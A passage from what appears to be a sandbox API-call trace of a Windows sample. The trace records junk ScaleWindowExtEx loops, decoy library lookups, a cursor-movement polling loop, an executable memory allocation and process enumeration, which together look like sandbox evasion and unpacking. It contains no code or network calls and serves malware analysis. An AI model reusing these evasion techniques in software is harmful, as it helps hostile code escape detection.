lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.802] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.803] VirtualAlloc (lpAddress=0x0, dwSize=0x21930000, flAllocationType=0x2000, flProtect=0x1) returned 0x2d30000 [0165.829] VirtualAlloc (lpAddress=0x2d30000, dwSize=0x2192c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2d30000 [0174.609] VirtualFree (lpAddress=0x2d30000, dwSize=0x2192c000, dwFreeType=0x4000) returned 1 [0180.381] VirtualFree (lpAddress=0x2d30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.898] LoadLibraryA (lpLibFileName="C3taUqjCU7eqAyIdAPzjF1nHWemMrup9L3lp460T2.dll") returned 0x0 [0182.899] GetModuleHandleA (lpModuleName="mzfjTcKYjWs7xdfL71cu9tmd9Cw") returned 0x0 [0182.899] GetProcAddress (hModule=0x0, lpProcName="AZMOMSaCRwayip0wWNKiES7U") returned 0x0 [0182.899] GetModuleHandleA (lpModuleName="user32") returned 0x77820000 [0182.899] GetProcAddress (hModule=0x77820000, lpProcName="GetCursorPos") returned 0x77841218 [0182.903] GetCursorPos (in: lpPoint=0x18ff2c | out: lpPoint=0x18ff2c*(x=667, y=445)) returned 1 [0182.903] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0182.903] Sleep (dwMilliseconds=0xac) [0183.083] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0183.083] Sleep (dwMilliseconds=0xac) [0183.270] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0183.270] Sleep (dwMilliseconds=0xac) [0183.457] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0183.457] Sleep (dwMilliseconds=0xac) [0183.644] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0183.644] Sleep (dwMilliseconds=0xac) [0183.831] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0183.831] Sleep (dwMilliseconds=0xac) [0184.018] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0184.018] Sleep (dwMilliseconds=0xac) [0184.205] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0184.206] Sleep (dwMilliseconds=0xac) [0184.393] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0184.393] Sleep (dwMilliseconds=0xac) [0184.580] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0184.580] Sleep (dwMilliseconds=0xac) [0184.768] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0184.768] Sleep (dwMilliseconds=0xac) [0184.955] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0184.955] Sleep (dwMilliseconds=0xac) [0185.141] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0185.142] Sleep (dwMilliseconds=0xac) [0185.329] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0185.329] Sleep (dwMilliseconds=0xac) [0185.853] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0185.853] Sleep (dwMilliseconds=0xac) [0186.031] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0186.031] Sleep (dwMilliseconds=0xac) [0186.218] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0186.218] Sleep (dwMilliseconds=0xac) [0186.406] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0186.407] Sleep (dwMilliseconds=0xac) [0186.593] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0186.593] Sleep (dwMilliseconds=0xac) [0186.779] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0186.779] Sleep (dwMilliseconds=0xac) [0186.967] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0186.967] Sleep (dwMilliseconds=0xac) [0187.154] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0187.154] Sleep (dwMilliseconds=0xac) [0187.378] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0187.378] Sleep (dwMilliseconds=0xac) [0187.559] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0187.560] Sleep (dwMilliseconds=0xac) [0187.747] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0187.747] Sleep (dwMilliseconds=0xac) [0187.934] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0187.934] Sleep (dwMilliseconds=0xac) [0188.121] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0188.121] Sleep (dwMilliseconds=0xac) [0188.308] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0188.309] Sleep (dwMilliseconds=0xac) [0188.496] VirtualAlloc (lpAddress=0x1d64000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d64000 [0188.498] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x250000 [0188.501] LoadLibraryA (lpLibFileName="shell32") returned 0x76b00000 [0188.501] LoadLibraryA (lpLibFileName="user32") returned 0x77820000 [0188.502] LoadLibraryA (lpLibFileName="advapi32") returned 0x76490000 [0188.502] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x260000 [0188.503] VirtualAlloc (lpAddress=0x0, dwSize=0x8000005, flAllocationType=0x3000, flProtect=0x4) returned 0x2d30000 [0190.492] VirtualFree (lpAddress=0x2d30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.774] VirtualAlloc (lpAddress=0x0, dwSize=0x101d0, flAllocationType=0x3000, flProtect=0x4) returned 0x4c0000 [0191.775] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe4 [0191.777] Process32FirstW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.778] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0191.779] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0191.779] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.780] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0191.781] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.782] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0191.782] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0191.783] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0191.784] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0191.785] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.785] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.786] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.787] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.788] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.788] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0191.789] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.790] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.791] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0191.791] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.792] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0191.793] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0191.794] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.794] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0191.795] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0191.796] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0191.797] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="easily.exe")) returned 1 [0191.798] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: 